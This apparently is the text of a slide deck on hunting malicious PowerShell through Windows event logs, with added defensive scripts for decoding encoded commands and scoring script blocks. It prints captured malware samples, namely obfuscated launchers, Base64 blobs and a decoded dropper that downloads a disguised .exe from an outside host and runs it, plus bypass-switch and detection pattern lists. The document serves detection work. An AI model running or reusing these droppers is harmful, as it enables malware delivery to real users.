AGIAZAAyADkAZgA2ADIAMwBkADAAMgBjAGQAYgBlADYAMgBkADEAYwBjADMAMwBhADUANgA2AGIAMQA1ADMAYwA3ADMANQA4AGEAYwAyADkAOAA3AGUANQBmAGYAOAA 3ADMAZQA1AGMAOQBkAGQAYwBiADcAMQA1ADAANwAwAGUAYwAwAGIANAA3ADQANwAwADMAMAA2ADEAOQAxADcAOAA0AGUANQA4ADgANgBlADAANQA3AGQANwAxAGI ANAAyAGQANgA2ADUAOQA0ADkAMAA1ADkANQBkADQAZgBhAGUANAAzADUANQA4ADQAMwBkAGIAMwBhAGQAZgA5ADEAYgA3ADcAMABhADMAYQA2AGUAYQAwADkANwAx AGMAYQA3AGIANAAwADkANgA2AGYAMQA1ADcANQA1AGMAYQA3AGYAMQA2AGIANgAyADAAMAA4ADEAYgAwADcAZQBhADUAYQBjAGQAOQBhADUAZgAzAGMANQBiADIANQA yADQAOAA2ADgANwA0ADgANgAyADIAYwAxADQAYgBlADgAZAA3ADUANAA5AGQAZQA5ADkAMAAwADkANwBjADcAMABkAGQAMgBiADcAMABiADEAYwBjADAANgBkADIAYgA4A DYAMQAyADUAMgA2ADgAMAA0AGEAYQBlAGMANAAxADUAZQAxADEAOAAzADgAZgA0ADIAMgA3ADEAYQBiAGYAOABhADAAMgBiADkANwA0ADMAOQAwAGQAMgA2ADMAYwB kADYAYQA4ADAANgA1ADgAMgBlAGEANwA3AGQAMQAwADQAYQBhAGQAOABlADgANQBlAGMAZQA1ADAAZABkAGIANQAwAGEAYgBmAGMAOAAzADAAMwBlADUAMgBiADYAY wBiAGMAMwBjADAAZAAzADEAZQBiAGMAYwAxAGMAMgBjADAAMwAzADEAMgAzAGYAYwBkAGMANgA1AGMANwA0AGUANQA4ADYAMQA5AGYAZAA0ADgAMQA3AGUANQA4A DUANwBlADgAZQAxAGUAOQA1AGMAZgBjAGQAMwBkADMAZgBmADgAMwBjADEAMAA4ADgANAA5ADMAYwBmADAAMAAzADUAYwBkADEAZAAxADkAMAAxADYANgA4ADgAMQ A5AGIAOQBiADkAMwAzADUAMgA4ADAAOAAxAGQAZQBkAGEAYwA0ADIAMwBiADUANAAwADQAMgAzADMANwBlAGEAZQA4ADgAMgAwADEAYQAyAGQAMAA2AGYAZQA3ADYA YQAwADEANQBjAGUAZQA5ADAAMABkAGMAMAA2AGIAZQBhADAANwBiADQAMQBjADAAZQAyAGUAOQAyADAAZgAyAGUAYgBmADQANAA0ADIAZAA2AGYAOAAwAGUAYQA3AD kANwA1ADcAOABjADUANgA0ADAANgAwAGYAYgA0ADUANwBjAGYAOAAxADUAOAA1AGUAZAA5ADEANABjADAAMAAyADcAOAA5ADIAZQBiAGQAMABlADUAMAA2ADkAZAAyADc AMwAxAGEAOAA4ADcAZQA1AGIAMAAzADcAYgBiAGQAMABjAGYAOAA0ADQAYQAyADEANwA0ADAAYgA2AGMAMgA4ADMAOQAxAGIAOQBmADMANgBlADQAMABjADAAMQA1A DYAYgA4ADQAMwA5AGMANwBhADYANABhAGUAYgA3ADUAZgBmAGYAMgBhADAAYQBiAGQAZQA3ADUAZgBiADMAMQA4ADcAMQA5AGYAZAAyADkAZAAxAGMANQA3AGEAYgA wADcANAA2AGUAMQA1ADEAYQBlAGMAZgAwAGMAZAA0ADQAYgAwAGQAMwA2ADAAMQBhAGEAYQA4ADkAZgBhADEAMwBjADAANQA3ADgANgAyAGQAMQAxAGIAZgA2AGMA 
NQBhADkAOABhADIAOAA0AGEANgBhADIAYgBkAGYAYQBhAGUANwA0AGYAOQBjADAAZABkADMAYwBiADAAZgBjAGIAMgAyADUAMgBiADEAZgA1ADcAMQAxAGEAYwAxAGMANw A3ADIANQAxADgAOAAxAGUAYQAxAGQAZQBkADAAMQA3ADEAZAAwADcANQA0ADcAMAAxADIANgAzADcAMgBiADcANwBkADgAMQAyAGQAYgBiAGEAZAA4ADEAZgAzADgAZABk ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke 150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 ) ).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE '*mdR*').NAME[3.11.2]-JOin'') MalwareArchaeology.com
  • 21.
    This PowerShell looksodd • cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV & %C^om^S^pEc% %C^om^S^pEc% /V /c set %LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set %var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set %var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "(nEW-ObJECT ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. ( '76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAU QB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1 ADMAMQBiADkAMQAzADUAYwBiAD – 42 more lines of Script Block code • ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke 150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 ) ).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE '*mdR*').NAME[3.11.2]-JOin'') MalwareArchaeology.com
  • 22.
    Did that look normal?
    • 4688 will show you the Process execution
      – What called what
    • What called PowerShell, and the parents above
      – Word > CMD > PowerShell = Always BAD
    • What did PowerShell logging catch?
      – That big blob looked interesting
  • 23.
    4688 – PowerShell Bypass
    Security Log
  • 24.
    PowerShell Bypasses
    • -W Hidden (-WindowStyle Hidden: hide the window YOU would see)
    • -NoP –sta –NonI –w hidden (no Profile, single-threaded apartment, Non-Interactive, hidden window)
    • -Exec Bypass (-ExecutionPolicy Bypass: ignore the execution policy) is the other one you will see constantly
  • 25.
    They do this to hide what you see
    • Bypass
    • Hidden Window
  • 26.
    They do this to hide what you see
    • 4688 will capture this behavior
      – Enabling "Process Command Line" auditing is key
    • Bypassing stops the profile from loading (in case any v2 logging is set there), hides the window, and ignores the execution policy
    • YAY Microsoft.. allows built-in bypasses
    • LOTS of ways to spell the bypasses
      – powershell.exe accepts any case-insensitive prefix of a switch name, so -nop, -NoP and -NoProf all mean -NoProfile, and -w, -Win and -WindowStyle are the same switch
  • 27.
    PowerShell Logs show it too
    • Windows PowerShell log (v2–v5): 400 (Engine Lifecycle), 600 (Provider Lifecycle)
    • Windows PowerShell log 500 (Command Lifecycle) IF command line logging is turned on in profile.ps1
      – But –NoP will not load profile.ps1, making this basically worthless
      – And WHY upgrading to PowerShell v5 is so important
    • Windows PowerShell log 800 (Pipeline Execution Details) when Module Logging is enabled (PowerShell v3 and later)
      – It lands in the classic Windows PowerShell log, not in PowerShell/Operational
  • 28.
    Security Log – 4688
    PowerShell Web Calls
  • 29.
    Fetch !!!
    • The malicious payload must phone home to get the dropper
    • System.Net.WebClient
    • DownloadString and/or http
    • -Enc or -EncodedCommand
    • There are lots of ways to spell PS commands ;-(
  • 30.
    Fetch !!!
    • 4688 will show them IF in the clear
    • Sometimes obfuscated
  • 31.
    Base64 Encoded
    • New way to hide from the "Process Command Line" 4688 event
      – No bypass words to check for… Silly hackers… It is still easy to spot
    • POWeRshEll -enCodedCOMmaNd
      – ZgB1AG4AYwB0AGkAbwBuACAAaQBlAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHMAdwBzAGUAZgAgACgAIAAkAFgARABKAFEAaABXAGYAcQBWAHUAWABvAFIASQAgACwAIAAkAHMAYgBUAGYATwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABYAEQASgBRAGgAVwBmAHEAVgB1AFgAbwBSAEkAIAAsACAAJABzAGIAVABmAE8AVAB0AG0ASgBzAGkARQBZAFYAWQB4ACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAHMAYgBUAGYATwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEgAWQBsAFoAYgBVAFcAZwBGAHYAUABZAGkAZwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwASwBkAG0ATwBiAFEAWgBWAEIAeQBRAHAAdgBCAFMAUQBpAHoAcAAuAGUAeABlACcAOwANAAoAaQBlAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHMAdwBzAGUAZgAgACcAaAB0AHQAcABzADoALwAvAGMAbwBtAGYAeQAuAG0AbwBlAC8AeQBiAG4AdwBpAGYALgBqAHAAZwAnACAAJABIAFkAbABaAGIAVQBXAGcARgB2AFAAWQBpAGcAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=
    • Base64 does not always need the =
      – The "=" is only padding, present when the encoded byte count is not a multiple of 3, so do not key a search on it
    • The blob is Base64 of UTF-16LE text, which is why it is full of "A" characters (the high zero byte of every ASCII character)
  • 32.
    Manual Translation
    • On a website
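The translation slide 32 does by hand on a website, and the "lots of ways to spell the bypasses" point from slides 24-26, as an added example that is not part of the deck: a PowerShell function that takes a 4688 "Process Command Line" string, resolves abbreviated switches the way powershell.exe does (any case-insensitive prefix of the switch name, down to a minimum length), flags the bypass switches, and decodes a -EncodedCommand blob whether or not its "=" padding was kept. The function names, the switch table and the sample command line are my own constructions; the prefix rule and the UTF-16LE encoding are how powershell.exe really behaves.

```powershell
# Added example, not code from the deck: pull bypass switches and the -EncodedCommand
# payload out of a 4688 "Process Command Line". powershell.exe accepts any case-insensitive
# prefix of a switch name (-nop, -NoP, -NoProf all mean -NoProfile), which is why plain word
# matching misses so many spellings. Switch table and minimum lengths per powershell.exe.
$Switches = @(
    @{ Name = 'NoProfile';       Min = 3 }   # -nop
    @{ Name = 'NonInteractive';  Min = 4 }   # -noni
    @{ Name = 'WindowStyle';     Min = 1 }   # -w hidden
    @{ Name = 'ExecutionPolicy'; Min = 2 }   # -ex bypass
    @{ Name = 'EncodedCommand';  Min = 1 }   # -e / -enc <base64>
)

function Resolve-PsSwitch {
    # Map one command-line token to the full switch name it abbreviates, or $null
    param([string]$Token)
    if ($Token -notmatch '^[-/]([A-Za-z]+)$') { return $null }
    $t = $Matches[1]
    foreach ($s in $Switches) {
        if ($t.Length -ge $s.Min -and
            $s.Name.StartsWith($t, [StringComparison]::OrdinalIgnoreCase)) { return $s.Name }
    }
    return $null
}

function ConvertFrom-EncodedCommand {
    # -EncodedCommand is Base64 of UTF-16LE text; the trailing '=' padding is optional on the
    # command line, so restore it before handing the string to the .NET decoder
    param([string]$Blob)
    $b = $Blob.Trim('"', "'")
    if ($b.Length % 4) { $b = $b.PadRight($b.Length + (4 - $b.Length % 4), '=') }
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b))
}

function Get-PsCommandLineIndicators {
    # Returns the bypass switches found, whether the window is hidden, and the decoded payload
    param([Parameter(Mandatory)][string]$CommandLine)
    $tokens = $CommandLine -split '\s+'
    $found  = [ordered]@{ Bypasses = @(); Hidden = $false; Decoded = $null }
    for ($i = 0; $i -lt $tokens.Count; $i++) {
        $name = Resolve-PsSwitch $tokens[$i]
        if (-not $name) { continue }
        $next = if ($i + 1 -lt $tokens.Count) { $tokens[$i + 1] } else { '' }
        switch ($name) {
            'NoProfile'       { $found.Bypasses += 'NoProfile' }
            'NonInteractive'  { $found.Bypasses += 'NonInteractive' }
            'WindowStyle'     { if ($next -match '^h') { $found.Hidden = $true; $found.Bypasses += 'WindowStyle Hidden' } }
            'ExecutionPolicy' { if ($next -match '^(bypass|unrestricted)') { $found.Bypasses += "ExecutionPolicy $next" } }
            'EncodedCommand'  { $found.Decoded = ConvertFrom-EncodedCommand $next }
        }
    }
    [pscustomobject]$found
}

# Constructed sample: build a launcher the way a dropper would, with the '=' padding dropped
$plain  = "(New-Object System.Net.WebClient).DownloadString('http://example.invalid/x')"
$blob   = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($plain)).TrimEnd('=')
$sample = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc $blob"   # constructed 4688 command line
$r = Get-PsCommandLineIndicators -CommandLine $sample
$r.Bypasses -join ', '   # the four switches, resolved to their full names
$r.Decoded               # the original download command, recovered from the unpadded blob
```

Feed it the CommandLine field of your 4688 events (or the deck's own blob from slide 31) and alert when Bypasses is non-empty or Decoded contains a web call; the decoded text is what you would otherwise wait for a 4104 to hand you.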
  • 33.
    PowerShell Log – 4104 Script Block Logging (Module Logging is 4103)
  • 34.
    Translated… Fetch
    function ieWLdWAwtHiFdfCSOsMbswsef ( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx ){(New-Object System.Net.WebClient).DownloadFile( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx );(New-Object -com Shell.Application).ShellExecute( $sbTfOTtmJsiEYVYx ); }
    try{
    kill -processname EXCEL;
    $HYlZbUWgFvPYig=$env:USERPROFILE+'\KdmObQZVByQpvBSQizp.exe';
    ieWLdWAwtHiFdfCSOsMbswsef 'https://comfy.moe/ybnwif.jpg' $HYlZbUWgFvPYig;
    }catch{}
    • Download a file disguised as a .jpg, drop it as an .exe in the user profile, and run it through Shell.Application, after killing Excel (the maldoc host)
    • Catch it as a PS 4104, not a Process Create 4688
  • 35.
    PowerShell Decodes for you !!!
    • A 4104 event will decode any –EncodedCommand Base64 blob, because it records the script block as it is handed to the engine, after decoding
    • Module Load
  • 36.
    PS Base64 blob
    POWeRshEll -enCodedCOMmaNd ZgB1AG4AYwB0AGkAbwBuACAAVgBiAGYASQBqAGEAYwBwAE8AawBwAFIAbABTAEQAcABPAFcAeABoAFoAZwAgACgAIAAkAEsAcQBCAGQAQQBUAGoARABMAGsAZQB6AE0AVwBPAFMAZwAgACwAIAAkAGMATABUAHcARQBvAGYAbQBBAE4AaQBVAHQAYQB4AEQAcABSAHAASABHAFoASQBHAEsAWQBGAG0AIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABLAHEAQgBkAEEAVABqAEQATABrAGUAegBNAFcATwBTAGcAIAAsACAAJABjAEwAVAB3AEUAbwBmAG0AQQBOAGkAVQB0AGEAeABEAHAAUgBwAEgARwBaAEkARwBLAFkARgBtACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAGMATABUAHcARQBvAGYAbQBBAE4AaQBVAHQAYQB4AEQAcABSAHAASABHAFoASQBHAEsAWQBGAG0AIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEcAbABOAEQAYgBvAGcASgB2AGUAeABNAGIASwBoAGUAPQAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFACsAJwBcAHUAYgBQAEQAbgBJAEwAbwBkAHcAWABTAFEAWQBpAFAAWABlAGMALgBlAHgAZQAnADsADQAKAFYAYgBmAEkAagBhAGMAcABPAGsAcABSAGwAUwBEAHAATwBXAHgAaABaAGcAIAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbQBmAHkALgBtAG8AZQAvAHUAdQBvAG8AdgBxAC4AagBwAGcAJwAgACQARwBsAE4ARABiAG8AZwBKAHYAZQB4AE0AYgBLAGgAZQA7AA0ACgANAAoAfQBjAGEAdABjAGgAewB9AA==
  • 37.
    4104 Decodes Base64 blobs
    • It is suddenly much more readable
  • 38.
    Obfuscation
    Security Log – 4688
    PowerShell Log – 4104
    Windows PowerShell Log – 400
  • 39.
    Fetch !!!
    • They will try to hide or obfuscate their behavior to make it hard to read
    • To me, this makes no difference, except I can't easily understand what they are doing
    • They will add plus "+" to concatenate string fragments back into a command
    • They will use backticks ` and quotes ' inside words to break keyword matches
    • They will use dollar $ (PowerShell) or percent % (cmd.exe) to designate variables
    • So look for the "Odd Characters" that indicate obfuscation!
      – You can thank Daniel Bohannon for this stuff
      – Or I should say $Daniel #B'o^h^a^n^n^o'n#
  • 40.
    Obfuscation – Odd stuff – 4688
    • Becomes obvious very quickly.. This is BAD
    • Counts of these characters are very telling once isolated or extracted from the blob
      – Screenshot callouts: Ticks, Plus +
  • 41.
    Obfuscation – Odd stuff – 4104
    • Now you can't look for words, so adapt
      – Screenshot callout: lots of special characters, some normal for PS
  • 42.
    Even older PowerShell v2 – Event ID 400
    • Look for odd characters
  • 43.
    4104 – PowerShell ScriptBlock Logging
    Microsoft-Windows-PowerShell/Operational Log
  • 44.
    Script Blocks are labeled
  • 45.
    Then you will see this in the logs
    • It is not translated, just recorded
    • But they are LARGE
      – You can trigger on, say, > 1000 characters
      – You can see this one will also trigger the Obfuscation check
  • 46.
    This is a normal Script Block
  • 47.
    Do they look the same?
      – Screenshot callouts: Readable / NOT Readable, Obfuscated
  • 48.
  • 49.
    4104 – PowerShell Script Block Logging (Module Logging is Event ID 4103)
    Microsoft-Windows-PowerShell/Operational Log
  • 50.
    WARNING !!!!
    • PowerShell does have a WARNING: a 4104 logged at Warning level when a script block matches its built-in list of suspicious content, and it does this even when Script Block Logging is not turned on
    • Trigger Alerts on these too
    • 4104
  • 51.
    WARNING !!!!
    • The Remote Command along with all this… = BAD
      – Just look.. It's NOT normal
  • 52.
    WARNING !!!!
    • And the raw log
  • 53.
    WARNING !!!!
    • And you can see translation in Event ID 4100
      – Screenshot callout: Translated
  • 54.
    WARNING !!!!
    • And you can see translation in Event ID 4100 (second screenshot)
  • 55.
    4100 – Executing Pipeline
    • Can see some translation occurring
      – Screenshot callouts: I can read this / NOT this
  • 56.
    PS v2 – 500 Events
    • Windows PowerShell log
      – Screenshot callout: This Base64 has 2 =
  • 57.
    PS v2 – 200 Events
    • Command Health
  • 58.
  • 59.
    Filtering out the good, to find the bad
    • PLEASE put a Mark/Sign/Secret Key in your scripts
  • 60.
    Code your PowerShell for exclusion
    • Make the scripts excludable on obvious things YOU or your company does or knows
    • The path is awesome
      – All scripts excluded by path alone
    • Names, Secret Code, Key
      – Have your scripts contain something only you know, a 'secret key' to exclude by
    • Or.. Sign your PS scripts
  • 61.
    Once you create these queries
  • 62.
    Create Email Alerts
    • Trigger on PS launching
    • Tweak and filter out known good
      – Get your developers to mark their code!!
  • 63.
    PowerShell Log Goodness
    • Enable the logs per the Cheat Sheets
    • PS v2 Logs (even if you have PS v5)
      – Collect Event ID 200, 400, 500 and 800
      – Windows PowerShell log
    • PS v5 Logs
      – Collect 4100, 4104
      – Microsoft-Windows-PowerShell/Operational log
    • Windows Logs
      – Collect 4688 WITH Process Command Line
  • 64.
    Security Log Event ID – 4688
    • PS executed
    • PS Bypass executed
    • PS Suspicious buzzwords
    • PS Count Obfuscation Characters (` ' + $ % ;)
      – There are others (& # and the cmd.exe caret ^, etc.); tweak as needed
    • You can look for large Script Blocks and Base64 here, but use the PS logs for this
  • 65.
    PowerShell v2 (Windows PowerShell log)
    • 200 – Command Health – WARNING, will give you some translation
    • 400 – Engine Lifecycle – What executed
    • 500 – Command Lifecycle – What executed and the command line, if profile.ps1 sets $LogCommandLifecycleEvent = $true (and $LogCommandHealthEvent = $true for the 200s)
      – and only if "No Profile" (-nop) was not used to skip the profile
  • 66.
    PowerShell v2 Event IDs – 200 and/or 400
    • PS Web Call
    • PS Count Obfuscation Chars (` ' + $ % ;)
    • PS ScriptBlock size (> 1000)
    • PS Base64 blocks
    • PS WARNINGS
  • 67.
    PowerShell v5 – PowerShell/Operational Log
    • 4100/4103 – Executing Pipeline – 4100 carries error records at WARNING level, 4103 is Module Logging (Information level)
    • 4104 – Execute a Remote Command – Verbose normally, WARNING when PowerShell itself flags the block as suspicious
    • Little obfuscation survives here: –EncodedCommand is decoded before logging, and each layer unwrapped by Invoke-Expression is logged as its own 4104, so you get progressively cleaner code
    • That big Base64 blob… now it is readable
  • 68.
    PowerShell v5 Event IDs – 4100 and/or 4104
    • PS Web Call
    • PS Suspicious Commands (buzzwords)
    • PS Count Obfuscation Chars (` ' + $ % ;)
    • PS ScriptBlock by size (> 1000)
    • PS Base64 blocks
    • PS WARNINGS
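The checks on slides 64-68 and the "code your PowerShell for exclusion" advice on slides 59-62, put together as one added PowerShell example that is not part of the deck: a scorer for 4104 script blocks that first throws away your own scripts (by path, by an embedded marker string, or by a valid Authenticode signature) and then counts web calls, buzzwords, obfuscation characters, Base64 runs, block size and the Warning level. The directory, the marker text, the pattern lists and every threshold are assumptions to baseline against your own estate; the 4104 field names (ScriptBlockText, Path) and levels (5 Verbose, 3 Warning) are what the event really carries. The three sample blocks are constructed, the first abridged from the dropper decoded on slide 34.

```powershell
# Added example, not code from the deck: score Script Block Logging events (4104 in
# Microsoft-Windows-PowerShell/Operational) after excluding known-good scripts.
# $CorpScriptRoot, $CorpMarker, the pattern lists and the thresholds are assumptions.
$CorpScriptRoot = 'C:\CorpScripts\'                 # assumption: where your own scripts live
$CorpMarker     = '# CORP-TAG: blue-team-approved'  # assumption: the "secret key" your developers add

$WebCallPatterns = 'System\.Net\.WebClient', 'DownloadString', 'DownloadFile',
                   'Invoke-WebRequest', 'Invoke-RestMethod', 'Net\.WebRequest', 'https?://'
$BuzzWords       = 'Invoke-Expression', '\bIEX\b', 'FromBase64String', 'Shell\.Application',
                   'Start-Process', 'Invoke-Mimikatz', 'Invoke-Shellcode', 'VirtualAlloc'

function Test-ScriptBlock {
    param(
        [Parameter(Mandatory)][string]$Text,
        [string]$Path = '',
        [int]$Level   = 5   # 4104 is normally level 5 (Verbose); PowerShell raises suspicious blocks to 3 (Warning)
    )
    # Known good first: your path, your marker, or a valid signature on the script file
    if ($Path -and $Path.StartsWith($CorpScriptRoot, [StringComparison]::OrdinalIgnoreCase)) { return $null }
    if ($Text.Contains($CorpMarker)) { return $null }
    if ($Path -and (Test-Path -LiteralPath $Path -ErrorAction SilentlyContinue) -and
        (Get-AuthenticodeSignature -LiteralPath $Path).Status -eq 'Valid') { return $null }

    $webCalls = @($WebCallPatterns | Where-Object { $Text -match $_ }).Count
    $buzz     = @($BuzzWords       | Where-Object { $Text -match $_ }).Count
    # Obfuscation characters from slide 64 (backtick, quote, + $ % ;) plus & and #
    $odd      = [regex]::Matches($Text, '[`''+$%;&#]').Count
    $b64Runs  = [regex]::Matches($Text, '[A-Za-z0-9+/]{100,}={0,2}').Count   # long Base64-looking runs
    $size     = $Text.Length

    $score = 2 * $webCalls + $buzz
    if ($odd -gt 10)    { $score += 2 }   # threshold is an assumption: baseline it on your own scripts
    if ($size -gt 1000) { $score += 1 }   # slide 45: big script blocks are worth a look
    if ($b64Runs -gt 0) { $score += 2 }
    if ($Level -eq 3)   { $score += 3 }   # PowerShell already thought it was suspicious

    [pscustomobject]@{
        Score = $score; WebCalls = $webCalls; BuzzWords = $buzz; OddChars = $odd
        Size  = $size;  Base64Runs = $b64Runs; Warning = ($Level -eq 3); Path = $Path
        Preview = $Text.Substring(0, [Math]::Min(60, $size))
    }
}

function Get-SuspiciousScriptBlocks {
    # Live hunt: read 4104 events from the local log, score each, keep the ones over $MinScore
    param([int]$MaxEvents = 5000, [int]$MinScore = 3)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
      ForEach-Object {
          $x = [xml]$_.ToXml(); $d = @{}
          foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = [string]$n.'#text' }
          Test-ScriptBlock -Text $d['ScriptBlockText'] -Path $d['Path'] -Level $_.Level
      } |
      Where-Object { $_ -and $_.Score -ge $MinScore } | Sort-Object Score -Descending
}

# Constructed samples so the scorer can be tried without a live log
$samples = @(
    # abridged from the dropper decoded on slide 34
    @{ Text = 'function dl ( $u , $out ){(New-Object System.Net.WebClient).DownloadFile( $u , $out );(New-Object -com Shell.Application).ShellExecute( $out ); } try{ kill -processname EXCEL; $p=$env:USERPROFILE+''\KdmObQZVByQpvBSQizp.exe''; dl ''https://comfy.moe/ybnwif.jpg'' $p }catch{}' }
    # a marked admin script: excluded, produces no row
    @{ Text = "$CorpMarker`nGet-Service | Where-Object Status -eq 'Running' | Export-Csv C:\Temp\services.csv"; Path = 'C:\Scripts\inventory.ps1' }
    # constructed Invoke-Obfuscation style text, as PowerShell would log it at Warning level
    @{ Text = '&("{1}{0}" -f ''EX'',''I'') ((''Ne''+''w-Ob''+''ject'') (''Net.We''+''bClient'')).(''Down''+''loadStr''+''ing'').Invoke(''http://example.invalid/a'')'; Level = 3 }
)
$samples | ForEach-Object { $h = $_; Test-ScriptBlock @h } |
    Format-Table Score, WebCalls, BuzzWords, OddChars, Warning, Preview -AutoSize
```

The marked script disappears from the table; the dropper scores on three web-call patterns and Shell.Application, and the obfuscated block scores on the http:// fragment, the character count and the Warning level even though no buzzword survived the string splitting, which is the point of slides 39-41. Run Get-SuspiciousScriptBlocks on a host with Script Block Logging enabled to apply the same scoring to the real log.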
  • 69.
    PowerShell v5 – Windows PowerShell Log
    • 800 – Pipeline Execution Details – What executed
      – Focus on the HostApplication field
  • 70.
    Sysmon
    • You can catch Not-PowerShell PowerShell execution (the engine hosted in some other process, so powershell.exe never runs)
    • Event ID 7 – Image loads
      – Look for a process other than powershell.exe loading System.Management.Automation.dll (or its System.Management.Automation.ni.dll native image)
    • And all the other cool stuff Sysmon collects
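The Sysmon Event ID 7 hunt on slide 70, as an added PowerShell example that is not part of the deck: a predicate that flags a PowerShell engine DLL being loaded by anything other than a known host, and a wrapper that runs it over the local Sysmon log. The host allow-list is an assumption to extend for your environment (add your own signed tools that embed the engine); the Sysmon field names (Image, ImageLoaded, ProcessId, Signed) are the real ones for Event ID 7, and the two sample paths are constructed.

```powershell
# Added example, not code from the deck: hunt Sysmon Event ID 7 (Image loaded) for
# "not-PowerShell PowerShell". The $KnownHosts allow-list is an assumption.
$KnownHosts = 'powershell.exe', 'powershell_ise.exe', 'pwsh.exe'   # assumption: extend for your estate

function Test-UnmanagedPowerShellLoad {
    # $true when the loaded image is the PowerShell engine and the loading process is not a known host
    param([Parameter(Mandatory)][string]$Image, [Parameter(Mandatory)][string]$ImageLoaded)
    $isEngine = $ImageLoaded -match '\\System\.Management\.Automation(\.ni)?\.dll$'
    $exe      = [IO.Path]::GetFileName($Image)
    return ($isEngine -and ($KnownHosts -notcontains $exe))
}

function Get-UnmanagedPowerShellLoads {
    # Live hunt over the local Sysmon log
    param([int]$MaxEvents = 20000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 7 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
      ForEach-Object {
          $x = [xml]$_.ToXml(); $d = @{}
          foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = [string]$n.'#text' }
          if (Test-UnmanagedPowerShellLoad -Image $d['Image'] -ImageLoaded $d['ImageLoaded']) {
              [pscustomobject]@{ Time = $_.TimeCreated; Image = $d['Image']; ProcessId = $d['ProcessId']
                                 ImageLoaded = $d['ImageLoaded']; Signed = $d['Signed'] }
          }
      }
}

# Constructed sample records: the first is normal, the second is the thing you are hunting for
$engine = 'C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll'
Test-UnmanagedPowerShellLoad -Image 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ImageLoaded $engine
Test-UnmanagedPowerShellLoad -Image 'C:\Users\bob\AppData\Local\Temp\updater.exe' -ImageLoaded $engine
```

Pair a hit with the 4104 events from the same time window: the engine still writes Script Block Logging regardless of which executable hosts it, so the loader from Sysmon and the script text from the PowerShell log together tell you what ran and who ran it.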
  • 71.
    How do I hunt for PS?
    • Log Management, obviously
    • What if you do not have fancy Log Management?
  • 72.
    How do I hunt for PS?
    • Without Log Management?
  • 73.
    Summary
    • LOG-MD will check your system and report
    • Upgrade to PS v5 – NOW !
    • Enable PowerShell logging !
    • Use the "Windows PowerShell Logging Cheat Sheet" on what to set
    • Create Reports and Alerts for the items discussed
    • Maybe add Sysmon on a few systems
    • Use the "Windows Splunk and Humio Logging Cheat Sheets" for some examples of what was discussed
    • Send us your improvements and tweaks !!!!
    • But START LOGGING POWERSHELL !!!!
  • 74.
    Resources
    • Websites
      – Log-MD.com – The tool
      – MalwareArchaeology.com – The "Windows PowerShell Logging Cheat Sheet(s)"
  • 75.
    Resources
    • https://www.invincea.com/2017/03/powershell-exploit-analyzed-line-by-line/
    List of Tools
    • https://github.com/emilyanncr/Windows-Post-Exploitation
